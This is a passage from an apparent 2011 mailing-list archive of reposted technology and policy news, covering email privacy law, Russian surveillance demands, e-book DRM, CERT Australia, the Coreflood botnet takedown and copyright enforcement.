Washington, as in workplaces across the country, email is a vital?if lamented?thread of work and social life, and the prospect of being cut off has some staffers panicked. This wasn't a factor during the shutdowns in the mid1990s, which happened before email devices were commonplace. Mary Kahn, a senior public-affairs specialist in the office that administers Medicaid, said (in an email) that she is pondering "a 12-step BlackBerry withdrawal program." Others are preparing to reroute work email to other electronicdevices. Like much about the potential shutdown, it isn't yet clear if federal email will continue undisrupted; most government websites won't continue operating. Speaking about his work BlackBerry, Rodney Whitlock, health-policy director for Iowa Republican Sen. Charles Grassley, said, "I have a Pavlovian response that I swear sometimes I feel like my hip's vibrating when it's not there." Mr. Whitlock also carries a smart phone he pays for himself. His shutdown contingency plan involves forwarding his work email to another address, which he can access with the smart phone. Mr. Whitlock expects others in his office would do the same, because many staffers also have personal cellphones and email devices, such as iPhones. In some corners of Capitol Hill, workers are whispering that chiefs of staff may go soft on the rule; they would allow workers to keep their electronic lifelines and just discourage pecking. "I don't think every office is going to put a big bucket out and make you put in your BlackBerry," a Senate Democratic aide said. The Committee on House Administration says House offices "may" require furloughed employees to turn in work BlackBerrys and cellphones and should require them to set an "out of office" message on their email, because such workers aren't permitted to perform official duties by email. The Committee hasn't said if email rerouting would be allowed. Employees wouldn't be permitted to reroute their email if the purpose was to engage in work, said Salley Wood, a spokeswoman for the committee. Just how far offices can push the line is an open question. Some in Washington say furloughed employees could get away with viewing emails?but not responding to them. "No one knows if you read it," the Democratic Senate aide said. ?Carol E. Lee contributed to this article. Write to Janet Adamy at janet.adamy at wsj.com From rforno at infowarrior.org Thu Apr 7 20:46:59 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 7 Apr 2011 21:46:59 -0400 Subject: [Infowarrior] - =?windows-1252?q?DOJ_to_Congress=3A_Don=92t_Saddl?= =?windows-1252?q?e_4th_Amendment_on_Us?= Message-ID: Justice Dept. to Congress: Don?t Saddle 4th Amendment on Us ? By David Kravets ? April 7, 2011 | ? 4:06 pm | http://www.wired.com/threatlevel/2011/04/fourth-amendment-email-2/ The Obama administration is urging Congress not to adopt legislation that would impose constitutional safeguards on Americans? e-mail stored in the cloud. As the law stands now, the authorities may obtain cloud e-mail without a warrant if it is older than 180 days, thanks to the Electronic Communications Privacy Act adopted in 1986. At that time, e-mail left on a third-party server for six months was considered to be abandoned, and thus enjoyed less privacy protection. However, the law demands warrants for the authorities to seize e-mail from a person?s hard drive. A coalition of internet service providers and other groups, known as Digital Due Process, has lobbied for an update to the law to treat both cloud- and home-stored e-mail the same, and thus require a probable-cause warrant for access. The Senate Judiciary Committee held a hearing on that topic Tuesday. The companies ? including Google, AOL and AT&T ? maintain that the law should be changed to reflect that consumers increasingly access their e-mail on servers, instead of downloading it to their hard drives, as a matter of course. But the Obama administration testified that imposing constitutional safeguards on e-mail stored in the cloud would be an unnecessary burden on the government. Probable-cause warrants would only get in the government?s way. James A. Baker, associate deputy attorney general, testified: Congress should recognize the collateral consequences to criminal law enforcement and the national security of the United States if ECPA were to provide only one means ? a probable cause warrant ? for compelling disclosure of all stored content. For example, in order to obtain a search warrant for a particular e-mail account, law enforcement has to establish probable cause to believe that evidence will be found in that particular account. In some cases, this link can be hard to establish. In one recent case, for example, law enforcement officers knew that a child exploitation subject had used one account to send and receive child pornography, and officers discovered that he had another email account, but they lacked evidence about his use of the second account. Baker invoked the usual parade of horribles in his argument. ?The government?s ability to access, review, analyze and act promptly upon the communications of criminals that we acquire lawfully, as well as data pertaining to such communications, is vital to our mission to protect the public from terrorists, spies, organized criminals, kidnappers and other malicious actors,? (.pdf) Baker testified. Don?t expect Congress to come out in favor of expanding Americans? civil liberties in the post?Sept. 11 world. CNET reported that Sen. Chuck Grassley (R-Iowa) said demanding warrants would be a burden to law enforcement in addition to ?the court system.? Congress has held countless hearings about reforming the Patriot Act, too. In the end, however, lawmakers have repeatedly punted on that issue, and we suspect they will embark on the same course when it comes to reforming EPCA. The judiciary, however, has taken a different course. A federal appeals court in December ruled that e-mails were protected by the warrant requirement. That decision by the 6th U.S. Circuit Court of Appeals became law March 21. It affects Kentucky, Michigan, Ohio and Tennessee. From rforno at infowarrior.org Fri Apr 8 18:09:34 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 8 Apr 2011 19:09:34 -0400 Subject: [Infowarrior] - Russian spy agency complains about Gmail, Skype Message-ID: UPDATE 1-Russian spy agency complains about Gmail, Skype 2:39pm EDT By Guy Faulconbridge http://www.reuters.com/article/2011/04/08/russia-internet-idUSLDE7371QW20110408 MOSCOW, April 8 (Reuters) - Russia's domestic security service called for access to encrypted communication providers like Gmail, Hotmail and Skype on Friday, saying the uncontrolled use of such services could threaten national security. The proposal by the main successor to the Soviet-era KGB secret police raised concerns some senior Russian officials would like to limit Internet access to stave off any potential protests ahead of the 2012 presidential election. "Different software is being distributed allowing the encryption of traffic: that is services including Gmail, Hotmail and Skype," Alexander Andreyechkin, the head of the Federal Security Service's special communications centre, was quoted as saying by state RIA news agency. "The uncontrolled use of these services could lead to a large-scale threat to Russian security," RIA quoted Andreyechkin as telling a Russian government commission on technology. Communications Minister Igor Shchyogolev said Russia had no plans to ban Google Inc's (GOOG.O: Quote, Profile, Research, Stock Buzz) Gmail, Microsoft Corp's (MSFT.O: Quote, Profile, Research, Stock Buzz) Hotmail service or Skype Ltd's Skype service. "There are no plans to cancel or close Skype, Gmail and Hotmail or any other foreign services working in Russia," Shchyogolev said in a statement. He added officials were simply studying how to regulate the new technologies. A Kremlin source said the FSB proposal was so radical it did not even merit comment, but after an major cyber attack on prominent hosting website LiveJournal many Internet users in Russia said they are worried. President Dmitry Medvedev's own blog on LiveJournal was crippled on Wednesday for at least an hour by a "denial of service" attack which he said was "revolting and illegal". "LIKE IN CHINA" The FSB proposal provoked a wave of negative comments in the Russian language Internet, with many saying Russia could follow China's attempts to limit the Internet. "We shall live as they do in China but only without the Chinese economy, without any prospects and without the shooting of those who are corrupt," said troublemakerno1 in Russian in an Internet discussion on www.mail.ru. Prime Minister Vladimir Putin's spokesman Dmitry Peskov said there was no cause for alarm. "There is no reason to be worried," Peskov said. "The FSB has a point of view: there are other points of view too. They are all going to be discussed." But tight state control of television means the Internet is one of the only areas where Russians can vent often scathing criticism of Putin, Medvedev and the Russian elite. Russia has at least 50 million Internet users out of a population of nearly 143 million and LiveJournal hosts more than 4.7 million Russian bloggers. LiveJournal said it had been the victim of large-scale attacks, some of which it believed were political. Svetlana Ivannikova, head of LiveJournal Russia, said lawyers were preparing a report for the Interior Ministry on the attacks. Diplomats told Reuters the attacks on LiveJournal had all the hallmarks of a highly organised, well-financed cyber attack. Security experts say Russia has an advanced cyber warfare unit made up of hackers who the security forces have enticed to work for the state. Opposition politicians said the authorities may be testing their ability to disrupt the Internet communications which played a prominent role in the uprisings across the Middle East and the Arab world. (Additional reporting by Denis Dyomkin; Editing by Steve Gutterman) From rforno at infowarrior.org Sat Apr 9 09:13:11 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sat, 9 Apr 2011 10:13:11 -0400 Subject: [Infowarrior] - This is What a Tweet Looks Like Message-ID: This is What a Tweet Looks Like By Sarah Perez / April 19, 2010 8:33 AM Think a tweet is just 140 characters of text? Think again. To developers building tools on top of the Twitter platform, they know tweets contain far more information than just whatever brief, passing thought you felt the urge to share with your friends via the microblogging network. A tweet is filled with metadata - information about when it was sent, by who, using what Twitter application and so on. Now, thanks to Raffi Krikorian, a developer on Twitter's API/Platform team, you can see what a tweet looks like, in all its data-rich detail. < - > http://www.readwriteweb.com/archives/this_is_what_a_tweet_looks_like.php From rforno at infowarrior.org Sun Apr 10 16:56:29 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 10 Apr 2011 17:56:29 -0400 Subject: [Infowarrior] - E-book business should take a page from music industry and go DRM-free Message-ID: <0E14524A-E203-4109-BCCB-F77887097B98@infowarrior.org> E-book business should take a page from music industry and go DRM-free By Rob Pegoraro, Friday, April , 9:42 AM http://www.washingtonpost.com/e-book-business-should-take-a-page-from-music-industry-and-go-drm-free/2011/04/05/AFBRbG1C_print.html I?ve done my part to prop up the consumer-electronics industry in recent years: a flat-panel TV downstairs and one upstairs, his and hers smartphones, not-too-obsolete digital cameras, a desktop computer upstairs and an iPad 2 downstairs (well, once it gets off back order). But one thing is missing from this electronic inventory: a Kindle, a Nook or any sort of e-book reader. That?s not an accident. The e-book business seems determined to repeat the early mistakes of the music industry with ?digital rights management? restrictions. But this time around, I don?t feel compelled to back their early investments with my own money. Think back to how the first good, mass-market music-download store worked. Apple?s iTunes Store seemed like a revelation compared with earlier, listener-hostile efforts, simply because it let you listen to your purchases in most cases. All you had to do was consent to listen to songs bought off iTunes only on the five computers you?d authorized with your account, plus any iPods or iPhones you owned. Those restrictions started to grate on some users. Then Steve Jobs admitted he wasn?t a fan of DRM himself, one major label decided it could do without it as well, Amazon launched an entirely DRM-free MP3 store .?.?. and less than two years later, DRM vanished from iTunes, too. Somehow, the recorded-music business did not perish. Digital sales should finally pass CD sales next year. E-books haven?t come as far along. If you buy a title from Amazon?s Kindle Store, Barnes & Noble?s Nook bookstore or Apple?s iBookstore, among others, the DRM attached to it will prevent you from reading that book on another company?s software or hardware. That might not seem like a problem today. Amazon makes a pretty good e-book reader today in the Kindle and has since shipped software for a growing variety of computers and smartphones. But do you trust it to lead that category of hardware and software for as long as you?d want to reread that book? E-book DRM also disables many functions common to paper books or other electronic documents. Most stores don?t let you copy text from a book to quote elsewhere, although Barnes & Noble is a welcome exception. Printing? Forget it, unless you go to the trouble of placing an e-reader face down in a copier, one page at a time. Lending is limited to those titles for which a publisher has authorized it and comes with condescendingly strict limits that most librarians would not recognize. For example, Amazon permits only one 14-day loan per authorized title, ever. Reselling an e-book? Forget it. All those limits and lock-ins make an e-book with DRM a dubious deal. Why would I want to pay almost as much as for a paper book ? in some cases more ? and then have my purchase constrain its usefulness and therefore cut its value? Some smaller publishers haven?t bought into DRM, just as independent record labels never saw the point of it. Tech publisher O?Reilly and Associates of Sebastopol, Calif., sells titles on its own site and through such outlets as the Kindle Store without any ?protection.? Has the company lost any sales? In a nutshell, no. E-book sales had grown to more than 10 times print sales on O?Reilly?s site by the end of 2010, wrote Vice President Andrew Savikas. The mainstream sites are showing some signs of being open to removing DRM. Amazon, Apple and Barnes & Noble now all allow publishers to opt out of DRM. Apple even defaults to omitting DRM, although it takes only one click for a publisher to restore that. But good luck finding out whether a potential purchase comes with the usual digital locks. Apple and Barnes & Noble provide zero indication of an e-book?s DRM status in their stores. On the Kindle Store, you might get lucky and find that a book?s title notes that virtue, or that a publisher has thought to tag that page with a ?drmfree? label. But most publishers don?t give their own authors that option. My colleague Joel Achenbach?s new book ?A Hole at the Bottom of the Sea? sailed into the Kindle Store with DRM intact because he never had a choice ? he was never asked. His agent, Michael Congdon, said major publishers don?t negotiate that. Maybe most authors would choose DRM anyway. Dan Pacheco, chief executive of Boulder, Colo.-based BookBrewer, wrote that his Internet-publishing startup will provide an author?s work without DRM, ?but no author has done that to date.? There is one way to settle this discussion. Give customers a clear choice, let the market work, and the book business might discover that it can read the recording industry?s sheet music. robp at washpost.com ? 2011 The Washington Post Company From rforno at infowarrior.org Sun Apr 10 18:23:44 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 10 Apr 2011 19:23:44 -0400 Subject: [Infowarrior] - Groklaw To Close May 16 Message-ID: <8DA69740-0EA5-4ED6-9AAB-795EE5D7FAB2@infowarrior.org> Groklaw Calls it a Day, To Close May 16 posted by Thom Holwerda on Sun 10th Apr 2011 19:57 UTC, submitted by PLan http://www.osnews.com/story/24623/Groklaw_Calls_it_a_Day_To_Close_May_16 Should I be sad or relieved? Groklaw, the website that played a central role in the SCO vs. sanity case, has just announced it will close up shop on May 16 of this year. Groklaw's place in history has been secured, surely, but in recent years, the site became more and more like a relic from the past, clearly stuck in the everyone vs. Microsoft mindset of the late '90s and early 2000s. Even in today's announcement post, Groklaw shows that its time has indeed come. I've never been an unequivocal fan of Groklaw, for the simple reason that its author, PJ, pretty much saw Microsoft's hand in everything. However, this does not negate the fact that Groklaw has played a crucial role in the SCO case; PJ uncovered several pieces of important evidence in the case, which even lead to SCO targeting her on a more personal level. Despite these accomplishments, the site started losing its edge the past few years - in my eyes, at least. PJ is still entirely hung up on Microsoft, even in today's announcement post. She goes on and on about how Microsoft is tying to destroy Android, and keeps on talking about the mobile space as if it's Microsoft vs. Linux, stating that Groklaw isn't needed because Android has beaten Microsoft. This makes no sense - Microsoft was already beaten long before Android came onto the market. Android is beating iOS and BlackBerry, not Microsoft. Still, credit where credit is due. "No matter what happens next, I know that we changed the course of history. How many people get to say that? I never expected it, frankly, and I am grinning just thinking about how much fun we've had doing it," PJ writes, "Our work will be available for historians permanently, so the impact we had isn't over today, and someday we'll tell our grandkids that we were part of this, part of Groklaw. We are in the history books. Our work will continue as long as anyone cares about this unique time period in the history of computer software, a history that we are a part of forever. And that is a long, long time." Thank you, PJ, for your work, and good luck with any future endeavours. From rforno at infowarrior.org Mon Apr 11 12:59:11 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 11 Apr 2011 13:59:11 -0400 Subject: [Infowarrior] - Inside AUSCERT Message-ID: <464C97D4-6842-4595-8533-98FDAC24706D@infowarrior.org> Inside CERT Australia Darren Pauli, ZDNet.com.au on April 11th, 2011 (19 hours ago) http://www.zdnet.com.au/inside-cert-australia_print-339311895.htm The Australian Government has a list of software holes that are so sensitive they're kept hidden from the public. These weaknesses are being used by criminals to steal our money and our data. They may even be a cornerstone to planned attacks on critical infrastructure, like energy, water and transport. But in the murky battle between those that protect us and those who seek to harm, these vulnerabilities are also the bait with which cyber-criminals are caught. The agency that keeps tabs on the vulnerabilities is the Computer Emergency Response Team (CERT) Australia, formed in 2009 to be a trusted ear in which organisations from around the world could whisper information on ruinous security threats that would otherwise remain secret. It functions also as a clearing house for security notifications from other CERTs around the world. Yet we don't hear much about it. Since its inception, the agency has kept tight-lipped on its operations, and not without cause. The agency has knowledge of security vulnerabilities that, if publicly disclosed, could grind significant elements of cyber crime to a halt. The holes could pull the rug from industry scourges like spam and fraud botnets, and prevent possible hacking attacks on the nation's big four banks and countless corporate giants. But in the game of security subterfuge, the vulnerabilities may be more valuable if they are kept hidden and used as a means to track skittish cyber criminals. The inevitable risk that withholding the threat places on you and I can be worth it for the chance to take-down a big target. "The reason some vulnerabilities are confidential is the minute the bad guys know people have tripped over them, they will change their techniques" says Mike Rothery, of the Attorney-General's Department whose division has responsibility for CERT Australia headed by Ms Deborah Anton. "If the vulnerabilities were known, criminals could go and write malware for it before it is fixed." The information is even withheld from the global CERT community, which has chapters in most countries. It is typically disclosed once the threat of exposure is deemed to have fallen, a decision that is reviewed on a daily basis. Yet some victims are too valuable to be sacrificial lambs. Australia cannot afford to suffer damage to its critical infrastructure, including power, water, energy, telecommunications and transport. The impact of a network attack on these could be devastating, and CERT Australia's job is to keep them informed on these sensitive security threats. "If we become aware of control nodes for botnets or those that harvest data that is being ex-filtrated out of a network, we will pass that information on so that it can be blocked at firewalls and organisations can see if they have a compromised machine," Rothery said. "We need to allow organisations to exploit known information on threats through our advisories for as long as possible." The agency issued 23 security advisories in the last six months of varying severity to a handful of state and private sector organisations that are listed in the Attorney-Generals' "Trusted Information Sharing Network". Those privy to the information must sign non-disclosure agreements. "We are not just restating things you will get from security bulletins from hardware and software vendors. It may include additional information about a vendor patch which, although the company may not publicly say, will mitigate a nasty vulnerability that is has the potential to be exploited." Australia's critical infrastructure operators will be tipped-off to the presence of these silent patches and told to implement them immediately. Some organisations may take months to roll out the same fix, or even ignore it completely. The privileged group of more than 300 companies under CERT Australia's wing is expanding, but it does not plan to offer the secretive information more broadly. It chooses organisations based primarily on the importance they hold to Australia, and then by the likelihood that they will be attacked. This process is fluid, so if CERT Australia notices an attack targeting, for instance, a coal excavation company it will bring it into the fold, and then look to neighbouring miners that may also be targeted. The mining sector is currently under consideration to be covered by CERT Australia, along with major banks. "The effects on the community if someone attacks mining would be significant," Rothery said. Discussions with the finance sector have only recently emerged, and surprisingly centre on the physical security of the industry datacentres. One of the specific concerns is how a bank may protect or deal with an attack against an air-conditioning system charged with the vital role of keeping a datacentre cool. Once an organisation has joined CERT Australia, it may be invited to send its engineers off to get hands-on experience dealing with complex and targeted attacks against SCADA infrastructure at the United States Government's Idaho National Laboratory ? the same lab used to create the Stuxnet worm, according to the New York Times. To date, 200 people have been trained courtesy of the Federal Government and a further 30 will be sent this year. Rothery said the training has a ripple effect, since those trained will likely move through industries and help teach others how to protect SCADA networks. The agency will also turn its focus onto consumers, creating many government-run public security education campaigns. It will produce books and alerts that form the backbone of campaigns such as Fraud Awareness Week. CERT's "toe in the water" was the booklet "Protecting Yourself Online", produced during cybersafety awareness week. It will be updated this year to include the internet service provider iCode agreement. It will also produce business and consumer advisories through the Stay Smart Online website, which has been the stomping ground of AusCERT. Rothery said the advisories will "supplement" AusCERT notices. URL:http://www.zdnet.com.au/inside-cert-australia-339311895.htm From rforno at infowarrior.org Mon Apr 11 13:16:30 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 11 Apr 2011 14:16:30 -0400 Subject: [Infowarrior] - Level 3 to Buy Global Crossing in $3 Billion Deal Message-ID: April 11, 2011, 8:25 am Level 3 to Buy Global Crossing in $3 Billion Deal By DEALBOOK http://dealbook.nytimes.com/2011/04/11/level-3-to-buy-global-crossing-in-3-billion-deal/ Level 3 Communications announced on Monday that it would buy Global Crossing in a transaction worth $3 billion. The deal values Global Crossing at $23.04 a share ? about 56 percent above the telecommunication company?s closing price on Friday. As part of the acquisition, Level 3 will also assume $1.1 billion of debt. The deal would combine the two companies? fiber-optic networks over three continents, offering data and voice connections to more than 70 countries. The combined entity will create a company with revenue of $6.26 billion and earnings of $1.57 billion, after taking into account projected cost savings. ?This is a transformational combination that we believe will deliver significant value to the investors, customers and employees of both Level 3 and Global Crossing,? James Q. Crowe, chief executive of Level 3, said in a statement. ?The complementary fit between the two companies? networks, service portfolios and customers is compelling.? Level 3 shares rose 12 percent in premarket trading. Global Crossing was up 59 percent. Level 3 already has significant shareholder support. Singapore Technologies Telemedia, Global Crossing?s largest investor with a stake of about 60 percent, has agreed to vote in favor of the acquisition. Once the deal closes, ST Telemedia is to nominate directors to the board, relative to the size of its stake. ?This strategic combination is an important milestone for both Global Crossing and Level 3, and a value-creating proposition for all stakeholders,? Lee Theng Kiat, chief executive officer of Singapore Technologies Telemedia, said in a statement. ?Going forward, we believe the combined strengths of the two companies will position it in a very favorable, competitive position to expand in the U.S. and compete globally.? Singapore Technologies Telemedia bought the stake in Global Crossing out of bankruptcy in 2003. Once a high-flying network operator, Global Crossing stumbled in the aftermath of the dot-com bust, filing for chapter 11 in early 2002. Level 3?s advisers included Bank of America Merrill Lynch, Citigroup and Morgan Stanley; Rothschild provided the fairness opinion; and Willkie Farr & Gallagher was the legal adviser. Goldman Sachs advised Global Crossing, while Latham & Watkins served as the company?s legal adviser. Singapore Technologies Telemedia worked with Credit Suisse Securities. From rforno at infowarrior.org Tue Apr 12 09:26:57 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 12 Apr 2011 10:26:57 -0400 Subject: [Infowarrior] - TSA still groping kids Message-ID: <6D72BE10-3756-4549-BBF3-6DEB769918A2@infowarrior.org> Video -- TSA still groping kids http://www.youtube.com/watch?v=ba030UmbkCo From rforno at infowarrior.org Tue Apr 12 15:11:57 2011 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 12 Apr 2011 16:11:57 -0400 Subject: [Infowarrior] - Democratic senator wants Internet sales taxes Message-ID: April 12, 2011 4:00 AM PDT Democratic senator wants Internet sales taxes by Declan McCullagh http://news.cnet.com/8301-31921_3-20052999-281.html A Democratic senator is preparing to introduce legislation that aims to end the golden era of tax-free Internet shopping. The proposal--expected to be made public soon after Tax Day--would rewrite the ground rules for Internet and mail order sales by eliminating the ability of Americans to shop at Web sites like Amazon.com and Overstock.com without paying state sales taxes. Dick Durbin of Illinois, the second most senior Senate Democrat, will introduce the bill after the Easter recess, a Democratic aide told CNET. "Why should out-of-state companies that sell their products online have an unfair advantage over Main Street bricks-and-mortar businesses?" Durbin said in a speech in Collinsville, Ill., in February. "Out-of-state companies that aren't paying their fair share of taxes are sticking Illinois residents and businesses with the tab." At the moment, Americans who shop over the Internet from out-of-state vendors aren't always required to pay sales taxes at the time of purchase. Californians buying books from Amazon.com or cameras from Manhattan's B&H Photo, for example, won't pay the sales taxes at checkout time that they would if shopping at a local mall--which is what Durbin means by giving online retailers an "unfair advantage." On the other hand, there are some 7,500 different taxing jurisdictions in the United States, each with a set of very precise rules describing what can and can't be taxed and at what rate. That makes it challenging terrain for retailers to navigate. In New Jersey, for instance, bottled water and cookies are exempt from sales tax (PDF), but bottled soda and candy are taxable. In Rhode Island, buying a mink handbag is taxed, but a mink fur coat is not (PDF). Durbin's bill will be called the Main Street Fairness Act, which follows legislation introduced last July in the House of Representatives bearing the same name. A possible co-sponsor is Sen. Mike Enzi, a Wyoming Republican who backed a similar proposal before and did not respond to a request for comment. (See related update below.) Making matters more difficult for the pro-tax forces is the decision by Rep. William Delahunt, a Massachusetts Democrat, not to run for reelection last year. Delahunt was probably Congress' most enthusiastic proponent of Internet sales taxes, and it's not clear a Republican-controlled House will be as eager to embrace the idea. One early indication: Rep. Dan Lungren, a California Republican, introduced legislation in February saying that allowing states to levy "onerous and burdensome sales tax collecting schemes on Internet-enabled small businesses that do not even reside in their state would adversely impact hundreds of thousands of jobs." Former GOP presidential candidate Ron Paul is one of the sponsors. The Direct Marketing Association, which sued Colorado last year to block a state tax law from taking effect, is preparing to rally opposition to Durbin's legislation. "You're just giving the states a blank check to make changes without any congressional oversight," says Jerry Cerasale, the DMA's senior vice president for government affairs. "We oppose that...We think that's abrogating the authority of Congress." In response to complexity concerns, the pro-tax forces have offered a proposal that they hope Congress can be persuaded to adopt. The concept is called the Streamlined Sales Tax Agreement, which was invented in 2002 by state tax officials hoping to straighten out some of sales tax laws' most notorious convolutions. Since then, some 24 states have signed on, either wholly or partially, to the agreement, meaning they have agreed to simplify their tax codes and make them uniform. If enough states participate, proponents believe it will ease concerns about complexity and make it easier to convince Congress to make sales collection mandatory for out-of-state retailers. Paul Misener, vice president of public policy for Amazon, says his employer isn't necessarily opposed to such legislation--as long as it's crafted very carefully. "We've long supported a truly simple, nationwide sales tax system, evenhandedly applied," he says. The current legal and political landscape was shaped by a 1992 case called Quill v. North Dakota, in which the U.S. Supreme Court ruled: "Congress is now free to decide whether, when, and to what extent the states may burden interstate mail order concerns with a duty to collect use taxes." Under the Quill ruling, out-of-state retailers generally don't have to collect taxes. One exception to that rule is a legal concept called "nexus," which means a company can be forced to collect sales taxes if it has a sufficient business presence, which is why Amazon doesn't have an office in California. (Another exception is the sale of cigarettes, which is covered by the Jenkins Act.) An important caveat is that under existing law, online purchases from sites like Amazon and eBay only seem to arrive tax-free. Legally, however, purchasers are required to pay their own state's sales tax rate--the concept is called a "use tax"--and then voluntarily report the amount owed at tax time. Few do. Support for Durbin's forthcoming legislation is likely to come from the Alliance for Main Street Fairness and like-minded companies including Wal-Mart and Best Buy. "Big box stores love to mobilize smaller booksellers to complain about competing with Amazon," says Steve DelBianco, executive director of the NetChoice coalition, which counts eBay, Overstock.com, and Yahoo as members. "The irony is that those small booksellers have been clobbered by big box stores. The Internet's their friend." Update 10:30 a.m. PT: I've heard back from Sen. Mike Enzi's office. It sent me e-mail this morning saying: "Senator Enzi plans to co-sponsor the Main Street Fairness bill with Senator Durbin. As far as a timeline or drafts, you'll have to check with Senator Durbin's office." From rforno at infowarrior.org Wed Apr 13 19:50:40 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 13 Apr 2011 20:50:40 -0400 Subject: [Infowarrior] - Feds commandeer botnet, issue 'stop' command Message-ID: In a first, feds commandeer botnet, issue 'stop' command By Dan Goodin in San Francisco Posted in Security, 13th April 2011 23:55 GMT http://www.theregister.co.uk/2011/04/13/coreflood_botnet_takedown/ For the first time ever, the US government has attempted to take down a botnet by setting up a substitute control channel that temporarily disables the underlying malware running on hundreds of thousands of infected end user computers. The move, announced Wednesday after federal prosecutors seized domain names, IP addresses and servers operated by the operators, is intended to cut the head off a notorious botnet known as Coreflood, which has infected more than 2 million Windows machines since 2002. During and 11-month period starting in March 2009, Coreflood siphoned some 190 GB worth of banking passwords and other sensitive data from more than 413,000 infected users as they browsed the net, authorities said. In a step never before taken in the US, federal prosecutors have obtained a court order allowing them to set up a substitute command and control server that will direct infected machines to temporarily stop running the underlying malware. The substitute instructions will have to be issued continuously for the foreseeable future because infected machines are automatically programmed to be reload Coreflood each time they are restarted. ?Issuing the stop command to the Coreflood software will further limit the ability of the operators of the botnet to regain control of the botnet through a variety of illegal means,? prosecutors wrote in a motion filed Tuesday for a court order to take over the C&C server. ?Indeed, failure to issue the stop command will increase the likelihood that the operators of the botnet will be able to successfully regain control of some part of their illicit network.? Prosecutors also obtained an order to log the IP addresses of all computers that report to the substitute C&C server. The government attorneys will then work with the underlying ISPs to track down each end user so he can be informed of the infection and be instructed how to use various antivirus products to disinfect the compromised machine. According to the court filing, no US law enforcement authority has ever sought court permission to control a seized botnet using a substitute C&C server. Dutch officials took a similar approach last year when they beheaded the Bredolab botnet, another network of infected machines used to steal vast amounts of financial information from its victims. The novel legal move came in a lawsuit prosecutors filed against 13 Coreflood operators named only as John Does because their true identities are unknown. It accuses them of engaging in wire fraud, bank fraud and illegal interception of electronic communications. The complaint and accompanying motions weren't unsealed until Wednesday, when the temporary restraining order they requested was granted. The order gives the feds control over two IP addresses (207.210.74.74 and 74.63.232.233) and 29 domain names used to run the Coreflood C&C server. It also grants feds authority to use a ?trap and trace? device to capture the IP addresses of the compromised computers. The motions recited a litany of invasions into the online comings and goings of those infected by the Coreflood malware. They included an unnamed defense contractor in Tennessee. After obtaining the online credentials from the firm's bank account, the operators managed to steal almost $242,000 from the firm after attempting to transfer more than $934,000. A North Carolina investment company lost more than $151,000. According to security researcher Joe Stewart of Secure Works, Coreflood started out as platform for launching DDoS, or distributed denial-of-service, attacks, but soon moved on to financial crime. Eventually, the botnet was able to compromise accounts even when they used two-factor authentication schemes such as those that rely on a physical token that generates one-time passwords. It's impossible to know exactly how many victims have been claimed by Coreflood, because machines are constantly being infected, disinfected, and in some cases, reinfected. While investigators counted 413,710 infected machines from March 2009 to January 2010, the total number of machines that were, or had been, part of Coreflood is more than 2.3 million, with more than 1.8 million of them appearing to be located in the US. The substitute C&C will be operated by the non-profit Internet System Consortium, with additional assistance coming from Microsoft. PDFs of the government's complaint and TRO motion are here and here. ? From rforno at infowarrior.org Wed Apr 13 19:51:58 2011 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 13 Apr 2011 20:51:58 -0400 Subject: [Infowarrior] - NZ Uses Earthquake As An Excuse To Sneak 3 Strikes Law Through Message-ID: <776F9C72-0778-4670-AF87-7B8ACCF7022B@infowarrior.org> New Zealand Uses Earthquake As An Excuse To Sneak 3 Strikes Law Through from the well-isn't-that-nice dept http://www.techdirt.com/articles/20110413/10333413881/new-zealand-uses-earthquake-as-excuse-to-sneak-3-strikes-law-through.shtml You may recall that a few years back, New Zealand politicians tried to sneak through a "three strikes" proposal to kick people offline based on accusations (not convictions) of file sharing. When lots of New Zealanders complained, the Copyright Minister first got angry that anyone wouldn't accept this, but eventually the government was forced to back down. Of course, that was only temporary, as last year the plan came back, with a sneaky provision that said they'd only really implement it if file sharing didn't decrease. The argument was that you couldn't say the law was about kicking people off the internet, because it wouldn't start doing that for a few years. Of course, that proposal hadn't been touched since last December... and yet suddenly it's being pushed through quickly, to the surprise of many New Zealand politicians who had no idea it was even on the docket. Even more nefarious? Supporters are trying to attach it to an emergency bill related to earthquake recovery efforts in the wake of the Christchurch earthquake. Of course, no politician wants to be seen holding up an earthquake recovery bill. This is the ultimate in underhanded moves by politicians, at the behest of the entertainment industry, to ram through broken policies by attaching it to a separate bill. Update: Good explanation in the comments showing that this bill wasn't "attached" to the earthquake bill, but rather just put through the same process in parallel. From rforno at infowarrior.org Thu Apr 14 17:00:57 2011 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 14 Apr 2011 18:00:57 -0400 Subject: [Infowarrior] - Google unveils 'copyright school' Message-ID: <4B25D8F1-A97E-41DC-8052-BF59203816C9@infowarrior.org> Google unveils 'copyright school' By: Jennifer Martinez April 14, 2011 09:04 AM EDT http://dyn.politico.com/printstory.cfm?uuid=2BEC4A16-DF78-4FDD-A796-08883A9C3EC7 Google released a set of tougher copyright policies for YouTube online video users on Thursday, requiring violators to watch a copyright tutorial and pass a test before allowing them to continue using the service. The search giant has faced mounting criticism from lawmakers and the entertainment industry for not doing enough to combat online copyright infringement. Google?s updated policies are intended to better educate users about the online video platform?s copyright rules and heighten awareness about protecting copyrights. In the past, YouTube has posted warnings to users specifying that the use of copyrighted materials ? such as movies, music or other copyright works ? could lead to termination of their account and possibly monetary damages if the copyright holder decides to sue. The new updates unveiled Thursday allow users to watch a new tutorial video about YouTube?s copyright policies and access a redesigned copyright help center. In addition, Google instituted new policies for users who are found to have violated YouTube?s copyright rules. If YouTube receives a copyright notification about a user?s video, the user will have to complete ?YouTube Copyright School,? which requires watching a tutorial video and passing a quiz to prove the user understands the copyright policies. Additionally, Google has also created a way for errant YouTube users to redeem themselves. In certain cases, Google will remove copyright strikes from a user?s account if he or she successfully completes its copyright school and has a solid track record of following the rules. Google?s general policy is to suspend YouTube users who have three copyright strikes. "We want to help our users operate within the law and within our guidelines. Requiring that people complete copyright school after receiving a copyright notification means they'll understand why their actions were wrong, come away with a better understanding of the law and be more likely to comply with YouTube's guidelines in future," a YouTube representative said in a statement to POLITICO. Just last week, lawmakers hammered Google for failing to clamp down on websites that illegally offer copyrighted material 